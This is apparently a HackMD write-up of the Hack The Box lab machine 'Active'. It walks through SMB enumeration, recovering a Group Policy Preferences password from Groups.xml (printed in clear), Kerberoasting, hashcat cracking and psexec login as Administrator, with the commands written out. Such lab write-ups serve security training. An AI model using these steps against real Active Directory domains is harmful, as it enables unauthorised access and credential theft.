Try   HackMD

HTB Series - Active

tags: htb active windows walkthrough

We start by scanning the target with nmap to find open ports
nmap -sC -sV -oA active 10.10.10.100

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Since we can see dns (53), ldap and smb (445) we are likely on a windows server.
Inspecting the output, there are no shares listed, so we can try to connect via smbclient with null authentication to enumerate them.
smbclient -L //10.10.10.100
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The IPC$ and SYSVOL shares are expected of a domain controller.

Smbmap offers similar results

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts.



smbmap -H 10.10.10.100 -r Replication --depth 8 
# depth accomplishes was recursive would have, 8 in this case was an estimate of how deep we would have to go.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The output depicts the presence of the Groups.xml file which is of interest to us so we can download it.



smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml
# -A acquires the file with the specified pattern

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

From the downloaded file we identify the credentials as follows:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We decrypt the password as shown:

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

An alternate way to get this would be to use smbclient








smbclient //10.10.10.100/Replication                                                          
Password for [WORKGROUP\cypher]:                                                                                 
Anonymous login successful                                                                                       
Try "help" to get a list of possible commands.                                                                   
smb: \> recurse ON                                                                                               
smb: \> prompt OFF
smb: \> mget *

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We then use impacket to view the users on the Domain
GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We try further enumeration using the given user account as follows:

smbmap -d active.htb- -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
# -d is for domain, -u is for user, -p is for password and -H is for Host

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We utilize the credentials gathered as follows:

On a windows box, open up a session as the user

runas /netonly /user:active.htb\svc_tgs cmd

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We can use bloodhound to proceed as follows:
Use sharphound on the windows box

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Verify the connection is working okay

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Turns out we just needed to add the DC as the primary DNS in the ethernet settings.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

From Bloodhound we query which accounts are susceptible to kerberoasting

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Attempt at Kerberoasting

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

From the hash acquired, we can look up on example hashcat hashes to find out the cracking mode to use

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We can then proceed to attempt to crack the hash with hashcat

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

We then proceed to use the credentials acquired to login as the Administrator via Psexec
psexec.py domain/User@ip

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Own the root flag

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Last changed by 
codeAssassin
As a code Assassin my focus is on Learning different ways to break code, and therefore, secure it. Interested in everything cyber security!
0
225

Read more

Jeeves - HTB Series

Windows Exploitation Walk through for Jeeves on Hack The Box

Sep 5, 2024
Windows Privilege Escalation

Fuzzy Security reference

Aug 26, 2024
Chatterbox - HTB Series

We start by scanning the target with nmap to find open ports

Aug 11, 2024
Metasploit 101

MSF architecture Modules Exploit: contains the exploit code Payload: contains the shell code used after exploit compromises a system Encoder: allows us to modify the appearance of our exploit in order to avoid signature detection NOP: used with buffer overflow and ROP attacks. A NOP generator produces a series of random bytes that can be used to bypass standard IDS and IPS NOP sled signatures. Auxiliary: performs arbitrary actions not directly related to exploitation e.g Scanning, fuzzing, and DOS attacks. Usually used to scan and verify that machines are exploitable. Post: used for looting and pivoting.

Aug 8, 2024
Read more from codeAssassin
Published on HackMD